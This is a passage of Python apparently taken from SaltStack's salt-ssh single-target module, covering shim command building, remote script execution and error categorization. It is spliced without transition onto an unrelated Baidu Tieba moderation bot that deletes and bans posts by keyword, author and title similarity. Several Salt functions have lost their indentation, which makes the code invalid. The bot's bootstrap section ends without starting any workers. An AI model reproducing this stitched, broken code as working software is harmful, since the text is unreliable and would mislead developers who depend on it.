            if data_cache:
                with salt.utils.files.fopen(datap, "w+b") as fp_:
                    fp_.write(self.serial.dumps(data))
        if not data and data_cache:
            with salt.utils.files.fopen(datap, "rb") as fp_:
                data = self.serial.load(fp_)
        opts = data.get("opts", {})
        opts["grains"] = data.get("grains")
        # Restore master grains
        for grain in conf_grains:
            opts["grains"][grain] = conf_grains[grain]
        # Enable roster grains support
        if "grains" in self.target:
            for grain in self.target["grains"]:
                opts["grains"][grain] = self.target["grains"][grain]
        opts["pillar"] = data.get("pillar")
        # Build the real wrapper with the fully merged opts and reload the
        # ssh wrapper modules against it.
        wrapper = salt.client.ssh.wrapper.FunctionWrapper(
            opts,
            self.id,
            fsclient=self.fsclient,
            minion_opts=self.minion_opts,
            **self.target
        )
        self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
        wrapper.wfuncs = self.wfuncs
        # We're running in the mine, need to fetch the arguments from the
        # roster, pillar, master config (in that order)
        if self.mine:
            mine_args = None
            mine_fun_data = None
            mine_fun = self.fun
            if self.mine_functions and self.fun in self.mine_functions:
                mine_fun_data = self.mine_functions[self.fun]
            elif opts["pillar"] and self.fun in opts["pillar"].get(
                "mine_functions", {}
            ):
                mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
            elif self.fun in self.context["master_opts"].get("mine_functions", {}):
                mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
            # mine_functions entries may be a dict of kwargs, a list of args
            # (optionally containing a {"mine_function": ...} item), or None.
            if isinstance(mine_fun_data, dict):
                mine_fun = mine_fun_data.pop("mine_function", mine_fun)
                mine_args = mine_fun_data
            elif isinstance(mine_fun_data, list):
                for item in mine_fun_data[:]:
                    if isinstance(item, dict) and "mine_function" in item:
                        mine_fun = item["mine_function"]
                        mine_fun_data.pop(mine_fun_data.index(item))
                mine_args = mine_fun_data
            else:
                mine_args = mine_fun_data
            # If we found mine_args, replace our command's args
            if isinstance(mine_args, dict):
                self.args = []
                self.kwargs = mine_args
            elif isinstance(mine_args, list):
                self.args = mine_args
                self.kwargs = {}
        try:
            if self.mine:
                result = wrapper[mine_fun](*self.args, **self.kwargs)
            else:
                result = self.wfuncs[self.fun](*self.args, **self.kwargs)
        except TypeError as exc:
            result = "TypeError encountered executing {0}: {1}".format(self.fun, exc)
            log.error(result, exc_info_on_loglevel=logging.DEBUG)
            retcode = 1
        except Exception as exc:  # pylint: disable=broad-except
            result = "An Exception occurred while executing {0}: {1}".format(
                self.fun, exc
            )
            log.error(result, exc_info_on_loglevel=logging.DEBUG)
            retcode = 1
        # Mimic the json data-structure that "salt-call --local" will
        # emit (as seen in ssh_py_shim.py)
        if isinstance(result, dict) and "local" in result:
            ret = salt.utils.json.dumps({"local": result["local"]})
        else:
            ret = salt.utils.json.dumps({"local": {"return": result}})
        return ret, retcode
    def _cmd_str(self):
        """
        Prepare the command string

        Builds the base64-encoded python shim (with the OPTIONS block filled
        in) and wraps it in the sh shim (or the winrm shim) for execution on
        the target.
        """
        sudo = "sudo" if self.target["sudo"] else ""
        sudo_user = self.target["sudo_user"]
        if "_caller_cachedir" in self.opts:
            cachedir = self.opts["_caller_cachedir"]
        else:
            cachedir = self.opts["cachedir"]
        # Checksums let the remote shim detect a stale/corrupt thin tarball.
        thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
        debug = ""
        if not self.opts.get("log_level"):
            self.opts["log_level"] = "info"
        # Enable shim debug output when the log level is debug or lower.
        if (
            salt.log.LOG_LEVELS["debug"]
            >= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
        ):
            debug = "1"
        # This literal is spliced into the python shim at the #%%OPTS marker,
        # hence the column-0 layout inside the triple-quoted string.
        arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
            config=self.minion_config,
            delimeter=RSTR,
            saltdir=self.thin_dir,
            checksum=thin_sum,
            hashfunc="sha1",
            version=salt.version.__version__,
            ext_mods=self.mods.get("version", ""),
            wipe=self.wipe,
            tty=self.tty,
            cmd_umask=self.cmd_umask,
            code_checksum=thin_code_digest,
            arguments=self.argv,
        )
        py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
        if six.PY2:
            py_code_enc = py_code.encode("base64")
        else:
            py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
        if not self.winrm:
            cmd = SSH_SH_SHIM.format(
                DEBUG=debug,
                SUDO=sudo,
                SUDO_USER=sudo_user,
                SSH_PY_CODE=py_code_enc,
                HOST_PY_MAJOR=sys.version_info[0],
                SET_PATH=self.set_path,
            )
        else:
            cmd = saltwinshell.gen_shim(py_code_enc)
        return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {0}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{0}{1}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{0}{1}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {0}".format(script))
return ret
    def shim_cmd(self, cmd_str, extension="py"):
        """
        Run a shim command.

        If tty is enabled, we must scp the shim to the target system and
        execute it there
        """
        if not self.tty and not self.winrm:
            # Fast path: pipe the shim straight through the ssh channel.
            return self.shell.exec_cmd(cmd_str)
        # Write the shim to a temporary file in the default temp directory
        with tempfile.NamedTemporaryFile(
            mode="w+b", prefix="shim_", delete=False
        ) as shim_tmp_file:
            shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
        # Copy shim to target system, under $HOME/.<randomized name>
        target_shim_file = ".{0}.{1}".format(
            binascii.hexlify(os.urandom(6)).decode("ascii"), extension
        )
        if self.winrm:
            target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
        self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
        # Remove our shim file
        try:
            os.remove(shim_tmp_file.name)
        except IOError:
            # Best effort: a leftover local temp file is harmless.
            pass
        # execute_script also deletes the remote copy after running it.
        ret = self.execute_script(script=target_shim_file, extension=extension)
        return ret
    def cmd_block(self, is_retry=False):
        """
        Prepare the pre-check command to send to the subsystem

        1. execute SHIM + command
        2. check if SHIM returns a master request or if it completed
        3. handle any master request
        4. re-execute SHIM + command
        5. split SHIM results from command results
        6. return command results
        """
        self.argv = _convert_args(self.argv)
        log.debug(
            "Performing shimmed, blocking command as follows:\n%s",
            " ".join([six.text_type(arg) for arg in self.argv]),
        )
        cmd_str = self._cmd_str()
        stdout, stderr, retcode = self.shim_cmd(cmd_str)
        log.trace("STDOUT %s\n%s", self.target["host"], stdout)
        log.trace("STDERR %s\n%s", self.target["host"], stderr)
        log.debug("RETCODE %s: %s", self.target["host"], retcode)
        error = self.categorize_shim_errors(stdout, stderr, retcode)
        if error:
            if error == "Python environment not found on Windows system":
                # Deploy python for winrm targets and run the shim again,
                # then strip the RSTR delimiter markers from both streams.
                saltwinshell.deploy_python(self)
                stdout, stderr, retcode = self.shim_cmd(cmd_str)
                while re.search(RSTR_RE, stdout):
                    stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
                while re.search(RSTR_RE, stderr):
                    stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
            elif error == "Undefined SHIM state":
                # Re-deploy thin and retry once.
                self.deploy()
                stdout, stderr, retcode = self.shim_cmd(cmd_str)
                if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                    # If RSTR is not seen in both stdout and stderr then there
                    # was a thin deployment problem.
                    return (
                        "ERROR: Failure deploying thin, undefined state: {0}".format(
                            stdout
                        ),
                        stderr,
                        retcode,
                    )
                while re.search(RSTR_RE, stdout):
                    stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
                while re.search(RSTR_RE, stderr):
                    stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
            else:
                return "ERROR: {0}".format(error), stderr, retcode
        # FIXME: this discards output from ssh_shim if the shim succeeds. It should
        # always save the shim output regardless of shim success or failure.
        while re.search(RSTR_RE, stdout):
            stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
        if re.search(RSTR_RE, stderr):
            # Found RSTR in stderr which means SHIM completed and only
            # and remaining output is only from salt.
            while re.search(RSTR_RE, stderr):
                stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
        else:
            # RSTR was found in stdout but not stderr - which means there
            # is a SHIM command for the master.
            shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
            log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
            if (
                "deploy" == shim_command
                and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
            ):
                # Shim asked for thin: deploy it and run the command again.
                self.deploy()
                stdout, stderr, retcode = self.shim_cmd(cmd_str)
                if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                    if not self.tty:
                        # If RSTR is not seen in both stdout and stderr then there
                        # was a thin deployment problem.
                        log.error(
                            "ERROR: Failure deploying thin, retrying:\n"
                            "STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
                            stdout,
                            stderr,
                            retcode,
                        )
                        return self.cmd_block()
                    elif not re.search(RSTR_RE, stdout):
                        # If RSTR is not seen in stdout with tty, then there
                        # was a thin deployment problem.
                        log.error(
                            "ERROR: Failure deploying thin, retrying:\n"
                            "STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
                            stdout,
                            stderr,
                            retcode,
                        )
                while re.search(RSTR_RE, stdout):
                    stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
                if self.tty:
                    # With a tty stderr is interleaved with stdout; discard it.
                    stderr = ""
                else:
                    while re.search(RSTR_RE, stderr):
                        stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
            elif "ext_mods" == shim_command:
                # Shim asked for the ext_mods tarball: ship it and retry.
                self.deploy_ext()
                stdout, stderr, retcode = self.shim_cmd(cmd_str)
                if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                    # If RSTR is not seen in both stdout and stderr then there
                    # was a thin deployment problem.
                    return (
                        "ERROR: Failure deploying ext_mods: {0}".format(stdout),
                        stderr,
                        retcode,
                    )
                while re.search(RSTR_RE, stdout):
                    stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
                while re.search(RSTR_RE, stderr):
                    stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
        return stdout, stderr, retcode
    def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
        """Translate raw shim output into a human-readable error message.

        Decodes the shim's stdout/stderr and matches them against a table of
        known failure signatures (permission problems, Python version
        mismatches, corrupted thin transfers, missing scp, Windows hosts
        without Python, ...).

        Returns the matching error description, or None when the shim appears
        to have run without a recognizable error.
        """
        stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
        stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
        if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
            # RSTR was found in stdout which means that the shim
            # functioned without *errors* . . . but there may be shim
            # commands, unless the only thing we found is RSTR
            return None
        if re.search(RSTR_RE, stderr):
            # Undefined state
            return "Undefined SHIM state"
        if stderr.startswith("Permission denied"):
            # SHIM was not even reached
            return None
        perm_error_fmt = (
            "Permissions problem, target user may need " "to be root or use sudo:\n {0}"
        )
        def _version_mismatch_error():
            # Build a remediation message for a master/target Python version
            # mismatch, keyed on the *master's* Python major/minor version.
            messages = {
                2: {
                    6: "Install Python 2.7 / Python 3 Salt dependencies on the Salt SSH master \n"
                    "to interact with Python 2.7 / Python 3 targets",
                    7: "Install Python 2.6 / Python 3 Salt dependencies on the Salt SSH master \n"
                    "to interact with Python 2.6 / Python 3 targets",
                },
                3: {
                    "default": "- Install Python 2.6/2.7 Salt dependencies on the Salt SSH \n"
                    " master to interact with Python 2.6/2.7 targets\n"
                    "- Install Python 3 on the target machine(s)",
                },
                "default": "Matching major/minor Python release (>=2.6) needed both on the Salt SSH \n"
                "master and target machine",
            }
            major, minor = sys.version_info[:2]
            help_msg = (
                messages.get(major, {}).get(minor)
                or messages.get(major, {}).get("default")
                or messages["default"]
            )
            return "Python version error. Recommendation(s) follow:\n" + help_msg
        # Known failure signatures as (retcodes, stderr regex, message)
        # triples; the first entry whose retcode or regex matches wins.
        errors = [
            (
                (),
                "sudo: no tty present and no askpass program specified",
                "sudo expected a password, NOPASSWD required",
            ),
            (
                (salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
                "Python interpreter is too old",
                _version_mismatch_error(),
            ),
            (
                (salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
                "checksum mismatched",
                "The salt thin transfer was corrupted",
            ),
            (
                (salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
                "scp not found",
                "No scp binary. openssh-clients package required",
            ),
            (
                (salt.defaults.exitcodes.EX_CANTCREAT,),
                "salt path .* exists but is not a directory",
                "A necessary path for salt thin unexpectedly exists:\n " + stderr,
            ),
            (
                (),
                "sudo: sorry, you must have a tty to run sudo",
                "sudo is configured with requiretty",
            ),
            ((), "Failed to open log file", perm_error_fmt.format(stderr)),
            ((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
            (
                (),
                "Failed to create directory path.*/salt",
                perm_error_fmt.format(stderr),
            ),
            (
                (salt.defaults.exitcodes.EX_SOFTWARE,),
                "exists but is not",
                "An internal error occurred with the shim, please investigate:\n "
                + stderr,
            ),
            (
                (),
                "The system cannot find the path specified",
                "Python environment not found on Windows system",
            ),
            (
                (),
                "is not recognized",
                "Python environment not found on Windows system",
            ),
        ]
        for error in errors:
            if retcode in error[0] or re.search(error[1], stderr):
                return error[2]
        # Nothing recognizable; let the caller decide what to do.
        return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
    """
    Create a list of file ref objects to reconcile

    Walks the lowstate chunks, collecting ``salt://`` references per
    saltenv (taken from the ``__env__``/``saltenv`` keys, defaulting to
    ``base``).  Returns a mapping of saltenv -> list of reference lists.
    """
    refs = {}
    for chunk in chunks:
        saltenv = "base"
        crefs = []
        for key, value in chunk.items():
            if key in ("__env__", "saltenv"):
                saltenv = value
            elif key.startswith("__"):
                # Other dunder keys carry no file references.
                continue
            # Note: the env keys above fall through here too; salt_refs
            # simply yields nothing for plain strings like "base".
            crefs.extend(salt_refs(value))
        if crefs:
            refs.setdefault(saltenv, []).append(crefs)
    return refs
def salt_refs(data):
    """
    Pull salt file references out of the states

    Accepts a single string or a list of items; anything that is a string
    starting with ``salt://`` is returned, everything else is dropped.
    """
    proto = "salt://"
    if isinstance(data, six.string_types):
        return [data] if data.startswith(proto) else []
    if isinstance(data, list):
        return [
            item
            for item in data
            if isinstance(item, six.string_types) and item.startswith(proto)
        ]
    return []
def mod_data(fsclient):
    """
    Generate the module arguments for the shim data

    Scans every fileserver environment for custom module directories
    (``_modules``, ``_states``, ...), caches the matching source files
    locally, and bundles them into a version-stamped tarball.  The version
    is a SHA1 over the hashes of all included files, so the tarball is only
    rebuilt when its contents change.

    Returns a dict with ``version`` and ``file`` keys, or an empty dict
    when no custom modules exist.
    """
    # TODO, change out for a fileserver backend
    sync_refs = [
        "modules",
        "states",
        "grains",
        "renderers",
        "returners",
    ]
    ret = {}
    envs = fsclient.envs()
    ver_base = ""
    for env in envs:
        files = fsclient.file_list(env)
        for ref in sync_refs:
            mods_data = {}
            pref = "_{0}".format(ref)
            for fn_ in sorted(files):
                if fn_.startswith(pref):
                    if fn_.endswith((".py", ".so", ".pyx")):
                        full = salt.utils.url.create(fn_)
                        mod_path = fsclient.cache_file(full, env)
                        if not os.path.isfile(mod_path):
                            continue
                        mods_data[os.path.basename(fn_)] = mod_path
                        # Fold each file's hash into the version string.
                        chunk = salt.utils.hashutils.get_hash(mod_path)
                        ver_base += chunk
            if mods_data:
                if ref in ret:
                    ret[ref].update(mods_data)
                else:
                    ret[ref] = mods_data
    if not ret:
        return {}
    if six.PY3:
        ver_base = salt.utils.stringutils.to_bytes(ver_base)
    ver = hashlib.sha1(ver_base).hexdigest()
    ext_tar_path = os.path.join(
        fsclient.opts["cachedir"], "ext_mods.{0}.tgz".format(ver)
    )
    mods = {"version": ver, "file": ext_tar_path}
    if os.path.isfile(ext_tar_path):
        # A tarball for this exact content already exists; reuse it.
        return mods
    # Use context managers so the version file and tarball handles are
    # closed even if packing fails part-way (the original leaked both on
    # error and never closed the version file at all).
    verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
    with salt.utils.files.fopen(verfile, "w+") as fp_:
        fp_.write(ver)
    with tarfile.open(ext_tar_path, "w:gz") as tfp:
        tfp.add(verfile, "ext_version")
        for ref in ret:
            for fn_ in ret[ref]:
                tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
    return mods
def ssh_version():
    """
    Returns the version of the installed ssh command

    Parses the banner printed by ``ssh -V`` (e.g. ``OpenSSH_7.4p1, ...``)
    into a tuple of leading integers such as ``(7, 4)``.  Falls back to
    ``(2, 0)`` when the banner cannot be parsed.
    """
    # This function needs more granular checks and to be validated against
    # older versions of ssh
    ret = subprocess.Popen(
        ["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
    ).communicate()
    try:
        # 'ssh -V' prints its banner on stderr: b'OpenSSH_7.4p1, OpenSSL ...'
        version_parts = ret[1].split(b",")[0].split(b"_")[1]
        parts = []
        # Split on b"." so each component is a byte string like b"7".
        # Iterating the bytes object directly (as the original did) yields
        # integer byte values on Python 3, so int() never raised and the
        # function returned a nonsense tuple of character codes.
        for part in version_parts.split(b"."):
            try:
                parts.append(int(part))
            except ValueError:
                # Stop at the first non-numeric component (e.g. b'4p1').
                return tuple(parts)
        return tuple(parts)
    except IndexError:
        return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{0}={1}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
run.py | import tiebalib
import logging
import math
import threading
import queue
import re
import time
import itertools
import jieba
from collections import Counter
def judge_thread(thread_list):
    """Score front-page threads for deletion/banning.

    Mutates each thread dict in place, adding:
      - ``result``: ``[delete_votes, block_votes]`` counters
      - ``reason``: human-readable reasons for each vote

    Relies on module-level config globals: ``same_author_limit``,
    ``same_topic_limit``, ``keywords`` and ``author_keywords``.
    """
    # Reset scoring fields on every thread.
    for thread in thread_list:
        thread["result"] = [0,0]
        thread["reason"] = []
    # --- Handle many front-page threads from the same author ---
    # The first 3 threads are excluded from the count (top of the page).
    author_counting = {}
    author_list = []
    for thread in thread_list[3:]:
        if thread["author"] not in author_counting:
            author_counting[thread["author"]] = 1
        else: author_counting[thread["author"]] += 1
    for author in author_counting:
        if author_counting[author] >= same_author_limit[0]:
            author_list.append(author)
    for author in author_list:
        if author != '----':# occasionally every author scrapes as '----'; skip so the whole front page isn't flagged
            temp_thread_list = []
            for thread in thread_list:
                if thread["author"] == author:
                    temp_thread_list.append(thread)
            # Sort by reply count ascending and flag the least-replied
            # threads beyond the allowed per-author quota.
            temp_thread_list.sort(key=lambda x:int(x["reply_num"]))
            for thread in temp_thread_list[:same_author_limit[1]]:
                thread["result"][0] += 1
                thread["reason"].append("超过同用户发贴数限制")
        else:
            logger.warning("首页出现了一次抓取错误,用户名均为'----'")
    # --- Handle near-duplicate thread titles on the front page ---
    # Strip punctuation before comparing titles.
    filterpunct = lambda s: ''.join(filter(lambda x: x not in punct, s))
    punct = set(u''':!),.:;?]}¢'"、。〉》」』】〕〗〞︰︱︳﹐、﹒
﹔﹕﹖﹗﹚﹜﹞!),.:;?|}︴︶︸︺︼︾﹀﹂﹄﹏、~¢
々‖•·ˇˉ―--′’”([{£¥'"‵〈《「『【〔〖([{£¥〝︵︷︹︻
︽︿﹁﹃﹙﹛﹝({“‘-—_… ''')
    for thread_cb in itertools.combinations(thread_list,2):
        (thread1,thread2) = thread_cb
        text1 = filterpunct(thread1["topic"])
        text2 = filterpunct(thread2["topic"])
        simi_rate = calculate_similarity(text1,text2)
        # If two titles are >80% similar, flag the one with fewer replies.
        if simi_rate > 0.8 and same_topic_limit:
            min_reply_thread = min(thread1,thread2,key = lambda p:p["reply_num"])
            min_reply_thread["result"][0] += 1
            min_reply_thread["reason"].append("首页标题撞车")
    # --- Keyword rules on titles and author IDs ---
    for thread in thread_list:
        for dic in keywords:
            if re.search(dic["keyword"],thread["topic"]) and dic["topic"]:
                if dic["delete"]:
                    thread["result"][0] += 1
                if dic["block"]:
                    thread["result"][1] += 1
                thread["reason"].append("关键词:"+dic["keyword"])
        for dic in author_keywords:
            if re.search(dic["author"],thread["author"]):
                if dic["delete"]:
                    thread["result"][0] += 1
                if dic["block"]:
                    thread["result"][1] += 1
                thread["reason"].append("ID关键词:"+dic["author"])
    return thread_list
def judge_post(post_list):
    """Score posts for deletion/banning.

    Mutates each post dict in place, attaching ``result``
    (``[delete_votes, block_votes]``) and ``reason`` lists.

    Uses module-level config globals: ``keywords``, ``author_keywords``,
    ``thread_level_limit``, ``smiley_limit`` and ``whitelist``.
    """
    for post in post_list:
        votes = [0, 0]
        reasons = []
        # Content keyword rules (only those enabled for posts).
        for rule in keywords:
            if rule["post"] and re.search(rule["keyword"], post["text"]):
                if rule["delete"]:
                    votes[0] += 1
                if rule["block"]:
                    votes[1] += 1
                reasons.append("关键词:" + rule["keyword"])
        # Author-ID keyword rules.
        for rule in author_keywords:
            if re.search(rule["author"], post["author"]):
                if rule["delete"]:
                    votes[0] += 1
                if rule["block"]:
                    votes[1] += 1
                reasons.append("ID关键词:" + rule["author"])
        # Thread starters (floor 1) below the minimum user level are removed.
        if post["floor"] == 1 and post["level"] < thread_level_limit:
            votes[0] += 1
            reasons.append("楼主低于指定等级")
        # Too many smileys: delete and block.
        if len(post["smiley"]) > smiley_limit:
            votes[0] += 1
            votes[1] += 1
            reasons.append("表情数量超出限制")
        # Whitelisted authors are never actioned (reasons kept for logging).
        if post["author"] in whitelist:
            votes = [0, 0]
        post["result"] = votes
        post["reason"] = reasons
    return post_list
def judge_comment(comment_list):
    """Score sub-comments (楼中楼) for deletion/banning.

    Mutates each comment dict in place, attaching ``result``
    (``[delete_votes, block_votes]``) and ``reason`` lists.

    The try/except is now per-comment, so one malformed entry is logged and
    skipped instead of aborting the scoring of every remaining comment (the
    original wrapped the whole loop in a single try block, and a None input
    even raised a NameError inside its own error handler).

    Uses module-level config globals: ``keywords``, ``author_keywords`` and
    ``whitelist``.
    """
    if not comment_list:
        # get_comment can return None/empty on a failed scrape; give the
        # caller an iterable either way.
        return []
    for comment in comment_list:
        try:
            comment["result"] = [0,0]
            comment["reason"] = []
            for dic in keywords:
                if re.search(dic["keyword"],comment["text"]) and dic["post"]:
                    if dic["delete"]:
                        comment["result"][0] += 1
                    if dic["block"]:
                        comment["result"][1] += 1
                    comment["reason"].append("关键词:"+dic["keyword"])
            for dic in author_keywords:
                if re.search(dic["author"],comment["user_name"]):
                    if dic["delete"]:
                        comment["result"][0] += 1
                    if dic["block"]:
                        comment["result"][1] += 1
                    comment["reason"].append("ID关键词:"+dic["author"])
            # Whitelisted users are never actioned.
            if comment["user_name"] in whitelist:
                comment["result"] = [0,0]
        except TypeError:
            logger.info("TypeError:" + str(comment))
        except Exception as e:
            logger.info("Error:" + str(comment) + str(e))
    return comment_list
def thread_spider():
    """Worker loop: scrape and handle the forum front page forever.

    Each cycle judges/handles all front-page threads, then queues the top
    ``once_scan_num`` threads for the post and comment spider workers.
    """
    while True:
        thread_list = tiebalib.get_thread_list(aim_tieba)# scrape the front-page thread list
        thread_handler(thread_list)# judge and act on front-page threads
        for thread in thread_list[:once_scan_num]:
            post_task_queue.put(thread)
            comment_task_queue.put(thread)
        time.sleep(spider_sleeptime)
def post_spider():
    """Worker loop: fetch the last page of posts for each queued thread."""
    while True:
        task = post_task_queue.get()
        posts_queue.put(tiebalib.get_post(task["tid"], pn=9999))
def comment_spider():
    """Worker loop: fetch sub-comments (楼中楼) for queued threads.

    Tracks per-post comment counts in the module-level ``comment_num`` dict
    so that on revisits only the newly added comment pages are fetched.
    """
    while True:
        thread = comment_task_queue.get()
        post_list = tiebalib.get_post(thread["tid"],pn=1)
        posts_queue.put(post_list)# also send page-1 posts for keyword checking
        if post_list:
            for post in post_list:
                if post["pid"] not in comment_num:
                    # First time seeing this post: remember the count and
                    # fetch every comment page (10 comments per page).
                    comment_num[post["pid"]] = post["comment_num"]
                    if post["comment_num"]:
                        pn = 1
                        while pn <= (post["comment_num"]//10+1):
                            comment_list = tiebalib.get_comment(post["tid"],post["pid"],pn)
                            comments_queue.put(comment_list)
                            pn += 1
                else:
                    if post["comment_num"] > comment_num[post["pid"]]:
                        # Count grew since last visit: fetch only the pages
                        # that may contain new comments.
                        pn = comment_num[post["pid"]]//10+1
                        while pn <= (post["comment_num"]//10+1):
                            comment_list = tiebalib.get_comment(post["tid"],post["pid"],pn)
                            comments_queue.put(comment_list)
                            pn += 1
                        comment_num[post["pid"]] = post["comment_num"]
def thread_handler(thread_list):
    """Apply judge_thread verdicts: delete and/or ban flagged threads.

    Outcomes are recorded by pid in the module-level ``is_succeed`` /
    ``is_failed`` lists so each thread is only actioned once.
    """
    result_list = judge_thread(thread_list)
    for thread in result_list:
        # Skip anything already handled (or already failed on).
        if (thread["pid"] not in is_succeed) and (thread["pid"] not in is_failed):
            if thread["result"][0]:
                # At least one delete vote: remove the whole thread.
                status = tiebalib.delete_thread(thread["tid"])
                if status["no"] == 0:
                    logger.info(' '.join(thread["reason"])+" 删除主题:"+thread["topic"]+" 作者:"+thread["author"])
                    is_succeed.append(thread["pid"])
                else:
                    logger.info(str(status) + " 删除主题失败 " + str(thread))
                    is_failed.append(thread["pid"])
            if thread["result"][1]:
                # At least one block vote: ban the author.
                status = tiebalib.blockid(thread["pid"], thread["author"])
                if status['errno'] == 0:
                    logger.info(' '.join(thread["reason"])+" 封禁主题:"+thread["topic"]+" 作者:"+thread["author"])
                    is_succeed.append(thread["pid"])
                else:
                    logger.info(str(status) + " 封禁主题失败 " + str(thread))
                    is_failed.append(thread["pid"])
def post_handler():
    """Worker loop: apply judge_post verdicts from the posts queue.

    Deletes flagged posts (the whole thread when the flagged post is
    floor 1) and bans flagged authors.  Outcomes are recorded by pid in the
    module-level ``is_succeed``/``is_failed`` lists so each post is only
    actioned once.
    """
    while True:
        post_list = posts_queue.get()
        result_list = judge_post(post_list)
        for post in result_list:
            if (post["pid"] not in is_succeed) and (post["pid"] not in is_failed):# skip already-handled posts
                if post["result"][0]:
                    if post["floor"] == 1:
                        # Floor 1 is the thread starter: delete the thread.
                        status = tiebalib.delete_thread(post["tid"])
                        if status["no"] == 0:
                            logger.info(' '.join(post["reason"])+" 删除主题:"+post["text"]+" 作者:"+post["author"])
                            is_succeed.append(post["pid"])
                        else:
                            logger.info(str(status)+" 删除主题失败 "+str(post))
                            is_failed.append(post["pid"])
                    else:
                        status = tiebalib.delete_post(post["tid"], post["pid"])
                        if status["no"] == 0:
                            logger.info(' '.join(post["reason"])+" 删除回复:"+post["text"]+" 作者:"+post["author"])
                            is_succeed.append(post["pid"])
                        else:
                            logger.info(str(status)+" 删除回复失败 " + str(post))
                            is_failed.append(post["pid"])
                if post["result"][1]:
                    status = tiebalib.blockid(post["pid"], post["author"])
                    if status['errno'] == 0:
                        logger.info(' '.join(post["reason"])+" 封禁回复:"+post["text"]+" 作者:"+post["author"])
                        is_succeed.append(post["pid"])
                    else:
                        logger.info(str(status)+" 封禁回复失败 "+str(post))
                        is_failed.append(post["pid"])
def comment_handler():
    """Worker loop: apply judge_comment verdicts from the comments queue.

    Deletes flagged sub-comments and bans flagged authors.  A successful
    delete decrements the cached count in ``comment_num`` so the comment
    spider does not refetch pages for removed comments.
    """
    while True:
        comment_list = comments_queue.get()
        result_list = judge_comment(comment_list)
        for comment in result_list:
            if comment["result"][0]:
                status = tiebalib.delete_comment(comment["tid"], comment["spid"])
                if status["no"] == 0:
                    # Keep the cached per-post comment count in sync.
                    comment_num[comment["pid"]] -= 1
                    logger.info(' '.join(comment["reason"])+" 删除楼中楼:"+comment["text"]+" 作者:"+comment["user_name"])
                else:
                    logger.info(str(status)+" 删除楼中楼失败 "+str(comment))
            if comment["result"][1]:
                status = tiebalib.blockid(comment["pid"], comment["user_name"])
                if status['errno'] == 0:
                    logger.info(' '.join(comment["reason"])+" 封禁楼中楼:"+comment["text"]+" 作者:"+comment["user_name"])
                else:
                    logger.info(str(status)+" 封禁楼中楼失败 "+str(comment))
def calculate_similarity(text1,text2):
    """Return the cosine similarity of two texts over jieba word counts.

    0 is returned when either text produces no words at all.
    """
    counts1 = Counter(jieba.cut(text1))
    counts2 = Counter(jieba.cut(text2))
    if not counts1 or not counts2:
        return 0
    shared = set(counts1) & set(counts2)
    dot_product = sum(counts1[word] * counts2[word] for word in shared)
    mod1 = sum(c * c for c in counts1.values())
    mod2 = sum(c * c for c in counts2.values())
    return dot_product / math.sqrt(mod1 * mod2)
# --- Configuration, logging and worker-thread bootstrap ---
from config import *
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
